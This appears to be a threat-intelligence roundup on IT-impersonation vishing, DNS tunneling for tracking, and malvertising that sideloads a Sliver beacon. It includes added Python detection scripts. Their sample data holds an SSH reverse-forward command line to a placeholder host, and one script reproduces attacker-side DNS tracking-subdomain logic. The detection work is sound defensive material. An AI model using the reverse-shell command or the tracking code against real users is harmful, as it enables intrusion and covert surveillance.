
CTI Roundup: Social Engineering, DNS Tunneling, & Malvertising

Ongoing social engineering campaign targets enterprises, hackers expand DNS tunneling, and a malvertising campaign leads to ransomware

Emerging Issue

This week, CTI highlights a social engineering campaign that overwhelms users with spam email before the actor poses as the company’s IT team. Next, CTI looks at Palo Alto’s latest case study, which details DNS tunneling applications observed in the wild. Finally, CTI investigates an ongoing campaign that distributes weaponized installers for WinSCP and PuTTY via malicious advertisements.

1. Ongoing social engineering campaign targets enterprises

An ongoing social engineering campaign attempts to overwhelm users with numerous spam emails before posing as the company’s IT team and calling the user to offer assistance.

In this campaign, a phone call prompts the user to download remote monitoring and management software or use Microsoft’s built-in Quick Assist feature to establish a remote connection to the device. The threat actor then downloads malicious payloads, harvests credentials, and establishes persistence.

Although the attacks do not involve ransomware, IOCs from the attacks have been previously linked to the Black Basta ransomware operation.

Rapid7 has observed several cases of this social engineering campaign since late April 2024. The attacks all begin with a group of users within the targeted environment receiving a large quantity of spam emails.

Rapid7 has confirmed that the volume of spam would be enough to “overwhelm the email protection solutions in place and arrived in the user’s inbox.”

The emails

The emails themselves are not inherently malicious. They are newsletter sign-up confirmation emails from many legitimate organizations. Because the user receives so many of them at once, they will likely become concerned, or at least question the activity.

The phone calls

After sending a large quantity of emails to the users, the threat actor will reach out to each user via a phone call, pretending to be someone from their IT team.

The actor will offer the user support for the email “issues” they are experiencing and will attempt to get the user to provide remote access to their device via remote monitoring and management (RMM) tools, like AnyDesk.

In other scenarios the actor abused the built-in Windows remote support utility Quick Assist. If a user did not fall for the social engineering attempt the actor would simply move on to the next targeted user.

Access obtained

If the user falls for the attempt and the actor gains remote access to the device, the actor starts by executing a series of batch scripts. These scripts are presented to the user as updates so that they look less suspicious.

The first script will verify connectivity to the C2 server and download a zip archive. This archive includes a legitimate copy of OpenSSH that is renamed to RuntimeBroker.exe along with its dependencies, RSA keys, and other SSH files.

The script establishes persistence with Run key entries that point to additional batch scripts created at run time. Each of these scripts executes SSH via PowerShell in an infinite loop, attempting to establish a reverse shell to the C2.

In all cases observed by Rapid7, the script harvested the credentials of the victim from the command line via PowerShell. The credentials are gathered when a prompt posing as an “update” asks the user to enter their credentials to log in for the update to proceed. In one case, after initial compromise, the actor moved laterally in the environment via SMB.
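The three endpoint artifacts described above (a Run key that launches a batch script, a renamed OpenSSH client masquerading as RuntimeBroker.exe, and PowerShell driving SSH toward a C2) can be checked against process and registry telemetry. The script below is an added example written for this roundup; it is not Rapid7's or Tanium's code. The event records are constructed and use this script's own field names rather than a real telemetry schema, the HKCU Run hive and the user-writable drop path are assumptions, and the SSH `-R` remote-forwarding flag is an assumption about how a renamed OpenSSH client would be driven to obtain a reverse shell.

```python
"""Triage constructed endpoint telemetry for the persistence/tooling pattern above.

Added example; not vendor code. Event dicts, field names, registry hive,
paths and the '-R' flag are constructed or assumed for illustration.
"""
import re
from pathlib import PureWindowsPath

SYSTEM32 = PureWindowsPath(r"C:\Windows\System32")

# Constructed sample telemetry (not from a real incident).
EVENTS = [
    {"event": "reg_set", "path": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "name": "Update", "value": r"C:\Users\alice\AppData\Local\Temp\upd.bat"},
    {"event": "reg_set", "path": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "name": "OneDrive",
     "value": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
    {"event": "proc_create", "image": r"C:\Windows\System32\RuntimeBroker.exe",
     "parent": r"C:\Windows\System32\svchost.exe", "cmdline": "RuntimeBroker.exe -Embedding"},
    {"event": "proc_create", "image": r"C:\Users\alice\AppData\Local\Temp\RuntimeBroker.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "RuntimeBroker.exe -i key -o StrictHostKeyChecking=no "
                "-R 12345:localhost:22 user@203.0.113.10"},
]

RUN_KEY_RE = re.compile(r"\\CurrentVersion\\(Run|RunOnce)$", re.IGNORECASE)


def flag_run_key(ev):
    """Run-key value whose command is a batch script (the page's persistence mechanism)."""
    if ev["event"] != "reg_set" or not RUN_KEY_RE.search(ev["path"]):
        return None
    target = ev["value"].split()[0].strip('"')
    if PureWindowsPath(target).suffix.lower() in {".bat", ".cmd"}:
        return f"run key '{ev['name']}' launches batch script {target}"
    return None


def flag_masquerade(ev):
    """RuntimeBroker.exe is a Windows binary that lives in System32; a copy elsewhere is suspect."""
    if ev["event"] != "proc_create":
        return None
    image = PureWindowsPath(ev["image"])
    if image.name.lower() == "runtimebroker.exe" and image.parent != SYSTEM32:
        return f"RuntimeBroker.exe running from non-system path {image.parent}"
    return None


def flag_ssh_reverse(ev):
    """PowerShell launching an SSH-style command line with remote forwarding (-R, assumed)."""
    if ev["event"] != "proc_create":
        return None
    parent = PureWindowsPath(ev["parent"]).name.lower()
    if parent in {"powershell.exe", "pwsh.exe"} and re.search(r"(^|\s)-R\s+\d+:", ev["cmdline"]):
        return f"PowerShell launched SSH reverse forward: {ev['cmdline']}"
    return None


def triage(events):
    """Run every check over every event and return the list of findings."""
    findings = []
    for ev in events:
        for check in (flag_run_key, flag_masquerade, flag_ssh_reverse):
            hit = check(ev)
            if hit:
                findings.append(hit)
    return findings


if __name__ == "__main__":
    for finding in triage(EVENTS):
        print("ALERT:", finding)
```

The legitimate RuntimeBroker.exe under System32 and the OneDrive Run entry pass; the batch-script Run key, the copy in Temp and the PowerShell-spawned SSH reverse forward are each flagged. In production the checks would be joined on process tree and timing rather than evaluated independently.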

Rapid7 did not observe the actor deploying ransomware in any of these attacks. However, the IOCs identified via forensic analysis align with that of the Black Basta ransomware operation.

Analyst comments from Tanium’s Cyber Threat Intelligence team

Researchers are increasingly observing advanced social engineering techniques like this campaign. This is mainly because they are effective.

In this attack, the threat actor sets up the user to believe they need support before posing as the IT team and reaching out to the victim, essentially creating their own problem to be “solved.”

This technique differs a little from the MGM attack but achieves the same goal, and it highlights the degree of sophistication that social engineering has recently taken on. Attacks of this kind will likely occur more often as threat actors continue to adopt generative AI and LLMs for things like deepfakes.

2. Hackers expand DNS tunneling

Palo Alto’s Unit 42 recently released a case study covering applications of DNS tunneling they have observed in the wild.

These threat actors use DNS tunneling to track when a target opens a phishing email or clicks a malicious link, and to scan for potential vulnerabilities.

These uses go beyond the traditional DNS tunneling use cases of C2 and VPN.

What is DNS tunneling?

DNS tunneling is a popular strategy that threat actors use to exfiltrate information. Threat actors often use DNS tunneling to establish communication with their C2, which enables them to exfiltrate and infiltrate data. Actors also commonly use DNS tunneling for VPN purposes. Regardless of the purpose, actors typically encode the data with their own scheme so that it blends in with legitimate DNS traffic.

Palo Alto’s research reveals that actors are now also using DNS tunnels for tracking and scanning.

DNS tunneling for tracking

Threat actors are now using DNS tunneling to track the activities of their targeted victims to see when they click on malicious links or advertisements.

To do this, an actor encodes information about the victim’s actions into a unique subdomain of a DNS query. That subdomain is the tunneling payload, and every query for it is logged by the attacker-controlled nameserver.

  • TrkCdn campaign: This campaign is meant to track a victim’s interaction with an email.

Palo Alto identified 731 potential victims of this campaign and 75 IP addresses for nameservers resolving 658 domains. To track, actors can query their DNS logs and compare the payload with the hash value of the email address to confirm if a particular victim has opened an email or clicked a link within an email.

  • SpamTracker campaign: Another real-world example of this is a campaign called SpamTracker, which uses DNS tunneling to track the delivery of spam messages.

This campaign has been tied to 44 tunneling domains, all sharing the same IP for their nameservers. The domains use a similar DGA naming method and encoding to other campaigns. SpamTracker is believed to originate from Japan and uses emails and website links to deliver spam and phishing with lures like fortune-telling services, fake package delivery updates, secondary job offers, and lifetime free items.
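The tracking mechanism described above works from both sides of the resolver: the attacker derives a per-recipient subdomain, and the defender sees a parent domain that suddenly accumulates many unique, random-looking subdomains. The script below is an added example for this roundup, not Unit 42's code. The domain names, recipients and resolver log lines are constructed; the encoding (a campaign tag plus the first 16 hex characters of the SHA-256 of the recipient address) is an assumption that mirrors the "compare the payload with the hash of the email address" step, and real campaigns use their own encodings. The `registrable()` split assumes two-label domains rather than consulting the public suffix list.

```python
"""DNS tunneling used for tracking, and a resolver-log check for it.

Added example; not Unit 42's code. Domains, recipients, log lines and the
hash-based encoding are constructed/assumed for illustration.
"""
import hashlib
import math
from collections import defaultdict


def tracking_fqdn(email: str, campaign: str, base_domain: str) -> str:
    """Attacker side: the unique subdomain embedded in a tracking link or image URL."""
    digest = hashlib.sha256(email.strip().lower().encode()).hexdigest()[:16]
    return f"{campaign}.{digest}.{base_domain}"


def who_opened(nameserver_queries, recipients, campaign, base_domain):
    """Attacker side: map query names seen at the authoritative server back to recipients."""
    expected = {tracking_fqdn(r, campaign, base_domain): r for r in recipients}
    return sorted({expected[q] for q in nameserver_queries if q in expected})


def shannon_entropy(label: str) -> float:
    """Bits per character of a label; random-looking payload labels score high."""
    counts = defaultdict(int)
    for ch in label:
        counts[ch] += 1
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registrable(fqdn: str, depth: int = 2) -> str:
    """Crude registrable-domain split (assumes two-label domains; no public suffix list)."""
    parts = fqdn.rstrip(".").split(".")
    return ".".join(parts[-depth:])


def tunneling_candidates(resolver_log, min_unique=5, min_entropy=2.5):
    """Defender side: parent domains with many unique, high-entropy subdomains."""
    subs = defaultdict(set)
    for line in resolver_log:
        qname = line.split()[2].lower()  # constructed log shape: "<ts> <client> <qname> <qtype>"
        parent = registrable(qname)
        sub = qname[: -len(parent) - 1] if len(qname) > len(parent) else ""
        if sub:
            subs[parent].add(sub)
    out = {}
    for parent, labels in subs.items():
        if len(labels) < min_unique:
            continue
        avg_ent = sum(shannon_entropy(lab.replace(".", "")) for lab in labels) / len(labels)
        if avg_ent >= min_entropy:
            out[parent] = {"unique_subdomains": len(labels), "avg_entropy": round(avg_ent, 2)}
    return out


# Constructed campaign data: eight recipients, five of whom "open" the mail.
RECIPIENTS = [f"user{i}@corp.example" for i in range(8)]
CAMPAIGN, TRK_DOMAIN = "c7", "trkcdn-example.test"
OPENED = RECIPIENTS[:5]

# Constructed enterprise resolver log: the five tracking lookups plus benign traffic.
RESOLVER_LOG = (
    [f"2024-05-20T10:0{i}:00Z 10.0.0.{i + 2} {tracking_fqdn(r, CAMPAIGN, TRK_DOMAIN)} A"
     for i, r in enumerate(OPENED)]
    + ["2024-05-20T10:07:00Z 10.0.0.9 www.example.org A",
       "2024-05-20T10:08:00Z 10.0.0.9 mail.example.org A",
       "2024-05-20T10:09:00Z 10.0.0.10 www.example.org A"]
)

if __name__ == "__main__":
    seen = [line.split()[2] for line in RESOLVER_LOG]
    print("attacker sees opened by:", who_opened(seen, RECIPIENTS, CAMPAIGN, TRK_DOMAIN))
    print("defender flags:", tunneling_candidates(RESOLVER_LOG))
```

The attacker never needs a response payload: the query itself is the signal, which is why the attacker-controlled nameserver only has to log. On the defender side, the `min_unique` and `min_entropy` thresholds are tunable; CDNs and telemetry services also produce many unique subdomains, so candidates should be reviewed against an allowlist before alerting.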

DNS tunneling for scanning

Threat actors also use DNS tunneling to scan a network, often with spoofed source IP addresses, to discover open resolvers that they can exploit. This activity is often the first stage of an attack.

  • SecShow campaign: Palo Alto identified a campaign where the actor used DNS tunneling to scan the network infrastructure of organizations, which was typically followed by reflection attacks.

The actor looked for open resolvers, tested resolver delays, and exploited any identified resolver vulnerabilities. This campaign primarily targeted the education, technology, and government sectors.

Analyst comments from Tanium’s Cyber Threat Intelligence team

Threat actors most commonly leverage DNS tunneling for C2 and VPN purposes.

Palo Alto’s case study reveals that threat actors are now expanding this technique for things like network scanning and tracking.

The tracking aspect is interesting and indicates that some threat actors are actually taking the time to see how far their campaign is reaching and how successful it is, rather than simply blasting out campaigns and hoping for the best.

3. Malvertising campaign leads to ransomware

An ongoing campaign is distributing weaponized installers for WinSCP and PuTTY via malicious advertisements.

The malware enables the threat actor to obtain an elevated foothold and blend in with legitimate administrative actions. In at least one case, the malvertising attack resulted in the attempt to distribute ransomware.

Malvertising campaign overview

This campaign started in early March 2024, when Rapid7 identified threat actors distributing weaponized WinSCP and PuTTY installers. Victims reach these malicious installers after searching for WinSCP or PuTTY downloads via a search engine and clicking on a malicious ad, which directs them to a site that closely resembles the legitimate download site.

The spoofed site links to a zip archive, hosted on a secondary domain embedded in the page, that contains the trojan. When the user downloads and extracts this content, the infection begins. As part of the attack, a malicious DLL is sideloaded.

Rapid7 notes that some of the TTPs in this attack “are reminiscent of past BlackCat/ALPHV campaigns.” In one case, Rapid7 saw the actor attempting to exfiltrate data via Restic and attempting to deploy ransomware. This attempt was blocked during execution.

Initial access

The infection begins when the user clicks on the malicious advertisement and downloads a fake WinSCP or PuTTY installer. The typosquatted PuTTY page used a domain with an extra “t”, making it difficult for the user to spot the difference.

The landing page of the typosquatted site consists of a download link along with two legitimate links to other resources. When the victim downloads the installer, the page calls an embedded function that ultimately redirects the user to the most recent malicious zip archive.
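A single extra character is easy for a user to miss but trivial for tooling to catch: comparing the second-level label of every domain in proxy or DNS logs against a short list of brands the organization downloads software from surfaces insertions, deletions, substitutions and adjacent swaps. The script below is an added example for this roundup, not Rapid7's or Tanium's code. The brand list and the observed domains are constructed placeholders (`.example` names), chosen so as not to assert which real domain is the official download site; the second-level split assumes two-label domains and does not consult the public suffix list.

```python
"""Flag look-alike domains within one edit of a brand list.

Added example; not vendor code. Brand and observed domains are constructed
placeholders; the registrable-label split is a simplification.
"""


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: insert, delete, substitute, adjacent transpose."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,          # delete
                          d[i][j - 1] + 1,          # insert (the extra "t")
                          d[i - 1][j - 1] + cost)   # substitute / match
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transpose
    return d[len(a)][len(b)]


def sld(domain: str) -> str:
    """Second-level label, e.g. 'puttty' from 'puttty.example' (assumes two-label domains)."""
    parts = domain.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def lookalikes(observed, brands, max_dist=1):
    """Return (observed, brand, distance) for domains whose label is within max_dist of a brand."""
    hits = []
    for dom in observed:
        for brand in brands:
            if dom.lower() == brand.lower():
                continue  # the genuine domain itself
            dist = osa_distance(sld(dom), sld(brand))
            if dist <= max_dist:
                hits.append((dom, brand, dist))
    return hits


# Constructed brand list and constructed domains pulled from a proxy log.
BRANDS = ["winscp.example", "putty.example"]
PROXY_DOMAINS = ["puttty.example", "winscp.example", "wincsp.example",
                 "putty-downloads.example", "example.org"]

if __name__ == "__main__":
    for dom, brand, dist in lookalikes(PROXY_DOMAINS, BRANDS):
        print(f"look-alike: {dom} ~ {brand} (distance {dist})")
```

A distance of 0 with a different top-level domain (the brand label on another TLD) is also reported, since that is a common squatting pattern; whether it is benign depends on the brand. Distance thresholds above 1 quickly produce noise on short labels, so for longer brand names a relative threshold works better than an absolute one.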

Execution

Once the zip archive is extracted, the user is presented with setup.exe, which is a renamed copy of python.exe. When executed, setup.exe will sideload a malicious DLL, python311.dll, which will load a renamed copy of the legitimate DLL, python3.dll.

After successful sideloading occurs the malware will perform a pre-unpacking setup and dynamically resolve additional functions. It uses functionality similar to the publicly available AntiHook library for setup and execution.

The malware resolves NTAPI (Windows Native API) functions to “bypass detection applied to more commonly used user mode functions (WINAPI) and access lower-level functionality that is otherwise unavailable.” After setup is complete, the malware retrieves an encrypted resource from the DLL and decrypts it in memory, producing a zip archive that contains three compressed files, including a legitimate MSI installer for PuTTY. The malware ultimately decrypts a file that is a Sliver beacon DLL.
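The sideloading layout above has a signature that does not depend on the malicious DLL's contents: a trusted executable (python.exe) running under a different name, with a DLL bearing a name that executable loads but whose hash is unknown, sitting in the same directory. The script below is an added example for this roundup, not Rapid7's or Tanium's code. It builds a throwaway directory of constructed placeholder files and a constructed known-good hash manifest; the hashes are of those placeholders, not of real Python binaries, and on a real host the manifest would be generated from a trusted install.

```python
"""Spot 'renamed trusted EXE + unknown DLL beside it' sideloading layouts.

Added example; not vendor code. The directory tree, file contents and the
known-good manifest are constructed placeholders built in a temp dir.
"""
import hashlib
import tempfile
from pathlib import Path


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def find_sideload_layouts(root: Path, manifest: dict) -> list:
    """manifest maps sha256 -> original file name of a trusted binary or DLL.

    A directory is flagged when it holds an .exe whose content matches a trusted
    executable but runs under another name; every DLL beside it whose hash is not
    in the manifest is listed as a sideload candidate (the python311.dll pattern).
    """
    findings = []
    for d in {p.parent for p in root.rglob("*") if p.is_file()}:
        files = {p.name.lower(): p for p in d.iterdir() if p.is_file()}
        for name, p in files.items():
            if not name.endswith(".exe"):
                continue
            original = manifest.get(sha256_of(p))
            if original is None or original.lower() == name:
                continue  # unknown exe, or a trusted exe under its own name
            finding = {"dir": str(d), "exe": name, "renamed_from": original, "untrusted_dlls": []}
            for dname, dp in files.items():
                if dname.endswith(".dll") and sha256_of(dp) not in manifest:
                    finding["untrusted_dlls"].append(dname)
            findings.append(finding)
    return findings


def build_sample(root: Path) -> dict:
    """Write constructed placeholder files and return the manifest of the 'trusted' ones."""
    trusted = root / "trusted"
    trusted.mkdir()
    (trusted / "python.exe").write_bytes(b"PLACEHOLDER: python.exe")
    (trusted / "python311.dll").write_bytes(b"PLACEHOLDER: python311.dll")
    manifest = {sha256_of(p): p.name for p in trusted.iterdir()}

    # A legitimate install: trusted exe under its own name, trusted DLL beside it.
    good = root / "Program Files" / "Python"
    good.mkdir(parents=True)
    (good / "python.exe").write_bytes(b"PLACEHOLDER: python.exe")
    (good / "python311.dll").write_bytes(b"PLACEHOLDER: python311.dll")

    # The layout described above: renamed python.exe, malicious python311.dll,
    # and the legitimate DLL renamed to python3.dll so execution still works.
    bad = root / "Downloads" / "putty-setup"
    bad.mkdir(parents=True)
    (bad / "setup.exe").write_bytes(b"PLACEHOLDER: python.exe")
    (bad / "python311.dll").write_bytes(b"PLACEHOLDER: malicious loader")
    (bad / "python3.dll").write_bytes(b"PLACEHOLDER: python311.dll")
    return manifest


def demo() -> list:
    """Build the sample tree in a temp dir and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        return find_sideload_layouts(root, build_sample(root))


if __name__ == "__main__":
    for f in demo():
        print(f"{f['dir']}: {f['exe']} is a renamed {f['renamed_from']}; "
              f"untrusted DLLs beside it: {f['untrusted_dlls']}")
```

Only the Downloads directory is reported: setup.exe hashes to the trusted python.exe, and python311.dll beside it is unknown, while python3.dll is recognized as the renamed legitimate DLL. Hash manifests miss recompiled or patched trusted binaries, so in practice this check complements Authenticode verification and PE version-info inspection rather than replacing them.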

Analyst comments from Tanium’s Cyber Threat Intelligence team

We already know that malvertising is popular, but this is one of the few instances in which a threat actor used it to attempt to deploy ransomware.

While the ransomware deployment was unsuccessful, there is the potential that this actor (or others) will try this method again. The combination of malvertising and ransomware is certainly concerning and differs from most ransomware deployments.

With ransomware, threat actors often target specific victims and need some degree of technical sophistication to obtain initial access. Using malvertising for initial access lets the victims come to the actor instead.



For further reading, catch up on our recent cyber threat intelligence roundups.

Tanium CTI

Tanium's Cyber Threat Intelligence (CTI) analysts process and extract trends from the daily cyber landscape to curate and deliver current intel to stakeholders around threats impacting business and security.
